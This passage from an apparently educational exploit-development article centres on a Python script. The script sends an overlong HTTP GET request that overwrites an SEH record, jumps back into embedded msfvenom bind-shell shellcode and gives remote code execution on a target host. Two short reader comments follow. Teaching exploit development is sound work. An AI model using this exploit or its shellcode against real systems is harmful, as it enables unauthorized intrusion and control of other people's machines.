# attack string, where the relative jump lands.
import socket
import sys

ip = sys.argv[1]
port = int(sys.argv[2])

#exploitstring = "A" * 5000

# windows/shell_bind_tcp, x86/call4_dword_xor, 368 bytes (msfvenom output above)
buf = ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xb1\x9a\x90\x8d\x83\xee\xfc\xe2\xf4\x4d\x72"
buf += "\x19\x8d\xb1\x9a\xf0\x04\x54\xab\x42\xe9\x3a\xc8\xa0"
buf += "\x06\xe3\x96\x1b\xdf\xa5\x11\xe2\xa5\xbe\x2d\xda\xab"
buf += "\x80\x65\xa1\x4d\x1d\xa6\xf1\xf1\xb3\xb6\xb0\x4c\x7e"
buf += "\x97\x91\x4a\x53\x6a\xc2\xda\x3a\xc8\x80\x06\xf3\xa6"
buf += "\x91\x5d\x3a\xda\xe8\x08\x71\xee\xda\x8c\x61\xca\x1b"
buf += "\xc5\xa9\x11\xc8\xad\xb0\x49\x73\xb1\xf8\x11\xa4\x06"
buf += "\xb0\x4c\xa1\x72\x80\x5a\x3c\x4c\x7e\x97\x91\x4a\x89"
buf += "\x7a\xe5\x79\xb2\xe7\x68\xb6\xcc\xbe\xe5\x6f\xe9\x11"
buf += "\xc8\xa9\xb0\x49\xf6\x06\xbd\xd1\x1b\xd5\xad\x9b\x43"
buf += "\x06\xb5\x11\x91\x5d\x38\xde\xb4\xa9\xea\xc1\xf1\xd4"
buf += "\xeb\xcb\x6f\x6d\xe9\xc5\xca\x06\xa3\x71\x16\xd0\xd9"
buf += "\xa9\xa2\x8d\xb1\xf2\xe7\xfe\x83\xc5\xc4\xe5\xfd\xed"
buf += "\xb6\x8a\x4e\x4f\x28\x1d\xb0\x9a\x90\xa4\x75\xce\xc0"
buf += "\xe5\x98\x1a\xfb\x8d\x4e\x4f\xc0\xdd\xe1\xca\xd0\xdd"
buf += "\xf1\xca\xf8\x67\xbe\x45\x70\x72\x64\x13\x57\xbc\x6a"
buf += "\xc9\xf8\x8f\xb1\x8b\xcc\x04\x57\xf0\x80\xdb\xe6\xf2"
buf += "\x52\x56\x86\xfd\x6f\x58\xe2\xcd\xf8\x3a\x58\xa2\x6f"
buf += "\x72\x64\xc9\xc3\xda\xd9\xee\x7c\xb6\x50\x65\x45\xda"
buf += "\x38\x5d\xf8\xf8\xdf\xd7\xf1\x72\x64\xf2\xf3\xe0\xd5"
buf += "\x9a\x19\x6e\xe6\xcd\xc7\xbc\x47\xf0\x82\xd4\xe7\x78"
buf += "\x6d\xeb\x76\xde\xb4\xb1\xb0\x9b\x1d\xc9\x95\x8a\x56"
buf += "\x8d\xf5\xce\xc0\xdb\xe7\xcc\xd6\xdb\xff\xcc\xc6\xde"
buf += "\xe7\xf2\xe9\x41\x8e\x1c\x6f\x58\x38\x7a\xde\xdb\xf7"
buf += "\x65\xa0\xe5\xb9\x1d\x8d\xed\x4e\x4f\x2b\x7d\x04\x38"
buf += "\xc6\xe5\x17\x0f\x2d\x10\x4e\x4f\xac\x8b\xcd\x90\x10"
buf += "\x76\x51\xef\x95\x36\xf6\x89\xe2\xe2\xdb\x9a\xc3\x72"
buf += "\x64\x9a\x90\x8d"

length = 5000

# Shrink the padding by the payload length so the SEH record stays at offset 4403.
firstpart = "A" * (4403 - len(buf))
nseh = "\xeb\x06\x41\x41"   # jmp short +6 over the SEH address
seh = "\x17\x63\xec\x6e"    # 0x6eec6317 POP/POP/RET, little endian

exploitstring = buf + firstpart + nseh + seh
exploitstring += "\xe9\xc0\xee\xff\xff"   # jmp $-4411: back to the first byte of buf
exploitstring += "D" * (length - len(exploitstring))

buffer = "GET /" + exploitstring + ".html/1.0\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ip, port))
s.send(buffer)

Next, we will look at a more complex way of dealing with space issues: an egghunter.

John Burns

System Administrator | Helping learners understand IT skills and best practices | Net+,Sec+, CYSA+ and SSCP Qualified

8 months

Thanks for sharing

Gregory Caringer

Cyber Security Professional | CISSP, CASP, SEC+, NET+, A+, CC

8 months

Very helpful! Thx you for the info


More articles by Georgia Weidman
